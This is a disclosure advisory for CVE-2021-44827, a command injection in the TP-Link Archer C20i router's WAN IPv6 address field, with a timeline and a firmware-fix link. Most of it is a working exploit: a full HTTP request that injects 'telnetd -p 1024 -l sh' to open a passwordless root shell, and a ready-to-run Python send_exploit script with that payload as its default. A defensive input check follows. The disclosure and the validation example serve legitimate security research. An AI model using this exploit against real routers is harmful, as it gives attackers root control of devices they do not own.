CVE-2021-44827

Summary

The TP-Link Archer C20i router contains an authenticated remote code execution vulnerability.

Tech details

The TP-Link Archer C20i running firmware version 0.9.1 3.2 v003a.0 Build 170221 Rel.55462 or older is vulnerable to authenticated remote code execution: an OS command injected into the WAN interface configuration web request is executed by the router. Administrator credentials for the web interface are required to exploit it.

Vulnerability

The vulnerable parameter is X_TP_ExternalIPv6Address. An exploit request may look like this (the credentials are sent Basic-encoded in the Authorization cookie, as the web UI does):

POST /cgi?2&2 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Content-Type: text/plain
Content-Length: 657
Origin: http://192.168.0.1
Connection: close
Cookie: Authorization=Basic YWRtaW46a2o4NzZmc2Q1NjI0ODk=

[WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1
X_TP_lastUsedIntf=ipoe_eth3_s
[WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,21
externalIPAddress=192.168.9.222
subnetMask=255.255.255.0
defaultGateway=192.168.9.2
NATEnabled=1
X_TP_FullconeNATEnabled=0
X_TP_FirewallEnabled=1
X_TP_IGMPProxyEnabled=1
X_TP_IGMPForceVersion=0
maxMTUSize=1500
DNSOverrideAllowed=1
DNSServers=192.168.9.3,0.0.0.0
X_TP_IPv4Enabled=1
X_TP_IPv6Enabled=0
X_TP_IPv6AddressingType=Static
X_TP_ExternalIPv6Address=&telnetd -p 1024 -l sh&
X_TP_PrefixLength=64
X_TP_DefaultIPv6Gateway=::
X_TP_IPv6DNSOverrideAllowed=0
X_TP_IPv6DNSServers=::,::
X_TP_MLDProxyEnabled=0
enable=1

This authenticated web request starts a telnet server on TCP port 1024 that runs sh as the login program, so anyone who connects gets a root shell without a password. The leading and trailing & end whatever command the firmware builds around the field value and run telnetd as a separate background job, so the configuration handler continues normally and the injection is not visible in the web UI.
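As an added example (not the PoC script from the repository linked below and not TP-Link's own code), the following Python rebuilds the request shown above from its parts and puts next to it the input check that would have rejected the injected value before it reached a shell. The section headers and field values are copied from the request above; the function names (build_body, basic_cookie, send_exploit, is_safe_ipv6), the CRLF line endings in the body, and the assumption that the firmware wraps the field value in a shell command are this example's own and are not stated in the advisory.

```python
# Added example (not the advisory's PoC): rebuild the CVE-2021-44827 request
# from its parts and show the check that would have stopped it.
# Assumptions not taken from the advisory: CRLF line endings in the body, and
# that the router builds a shell command around the field value (the advisory
# only says an OS command injected there is executed).
import base64
import http.client
import ipaddress
import string

# Section headers and non-injected values copied verbatim from the advisory.
WAN_ETH_SECTION = "[WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1"
WAN_IP_SECTION = "[WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,21"
WAN_IP_FIELDS = [
    ("externalIPAddress", "192.168.9.222"),
    ("subnetMask", "255.255.255.0"),
    ("defaultGateway", "192.168.9.2"),
    ("NATEnabled", "1"),
    ("X_TP_FullconeNATEnabled", "0"),
    ("X_TP_FirewallEnabled", "1"),
    ("X_TP_IGMPProxyEnabled", "1"),
    ("X_TP_IGMPForceVersion", "0"),
    ("maxMTUSize", "1500"),
    ("DNSOverrideAllowed", "1"),
    ("DNSServers", "192.168.9.3,0.0.0.0"),
    ("X_TP_IPv4Enabled", "1"),
    ("X_TP_IPv6Enabled", "0"),
    ("X_TP_IPv6AddressingType", "Static"),
    ("X_TP_ExternalIPv6Address", None),  # filled with the injected command
    ("X_TP_PrefixLength", "64"),
    ("X_TP_DefaultIPv6Gateway", "::"),
    ("X_TP_IPv6DNSOverrideAllowed", "0"),
    ("X_TP_IPv6DNSServers", "::,::"),
    ("X_TP_MLDProxyEnabled", "0"),
    ("enable", "1"),
]


def build_body(command: str) -> str:
    """Return the text/plain body with `command` in X_TP_ExternalIPv6Address.

    The surrounding '&' end whatever shell command the firmware wraps around
    the value and run the injected command as a background job, so the
    configuration handler carries on as if the value were a normal address.
    """
    lines = [WAN_ETH_SECTION, "X_TP_lastUsedIntf=ipoe_eth3_s", WAN_IP_SECTION]
    for name, value in WAN_IP_FIELDS:
        if value is None:
            value = f"&{command}&"
        lines.append(f"{name}={value}")
    return "\r\n".join(lines) + "\r\n"  # CRLF is an assumption (see above)


def basic_cookie(username: str, password: str) -> str:
    """Build the Cookie value the web UI sends in place of an Authorization header."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Authorization=Basic {token}"


def send_exploit(host: str, username: str, password: str,
                 command: str = "telnetd -p 1024 -l sh", timeout: float = 5.0) -> int:
    """POST the crafted configuration to /cgi?2&2 and return the HTTP status.

    Only run this against a device you are authorised to test.
    """
    body = build_body(command).encode()
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    conn.request("POST", "/cgi?2&2", body=body, headers={
        "Referer": f"http://{host}/mainFrame.htm",
        "Content-Type": "text/plain",
        "Content-Length": str(len(body)),  # computed, not hard-coded
        "Cookie": basic_cookie(username, password),
    })
    status = conn.getresponse().status
    conn.close()
    return status


_IPV6_CHARS = set(string.hexdigits + ":.")  # '.' allows IPv4-mapped forms


def is_safe_ipv6(value: str) -> bool:
    """The check a handler should apply before the value reaches a shell.

    The character whitelist comes first on purpose: ipaddress.IPv6Address
    accepts a '%scope' suffix on Python 3.9+ and only checks that the scope
    text is non-empty and has no further '%', so parsing alone would let a
    value such as 'fe80::1%;id' through.
    """
    if not value or set(value) - _IPV6_CHARS:
        return False
    try:
        ipaddress.IPv6Address(value)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    body = build_body("telnetd -p 1024 -l sh")
    fields = dict(line.split("=", 1) for line in body.splitlines() if "=" in line)
    print("X_TP_ExternalIPv6Address =", fields["X_TP_ExternalIPv6Address"])
    print("passes strict check:", is_safe_ipv6(fields["X_TP_ExternalIPv6Address"]))
```

Validation alone is only half of the fix a firmware author should make: the value should also never be interpolated into a shell command line at all, but passed as a separate argument to the network configuration tool.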

Proof-of-concept

A proof of concept python script is available in this repo:

https://github.com/full-disclosure/CVE-2021-44827

Update is available

To fix the issue, update to the latest available firmware from TP-Link:

https://www.tp-link.com/en/support/download/archer-c20i/#Firmware

The Full Disclosure team recommends using routers that support OpenWrt.

Timeline

2021-12-08 - initial research
2021-12-09 - CVE-2021-44827 assigned
2021-12-13 - an exploit PoC sent to TP-Link
2021-12-21 - TP-Link confirmed the issue
2022-01-18 - TP-Link releases a fixed firmware and asks for verification
2022-02-17 - TP-Link publishes the fixed firmware
2022-03-02 - full disclosure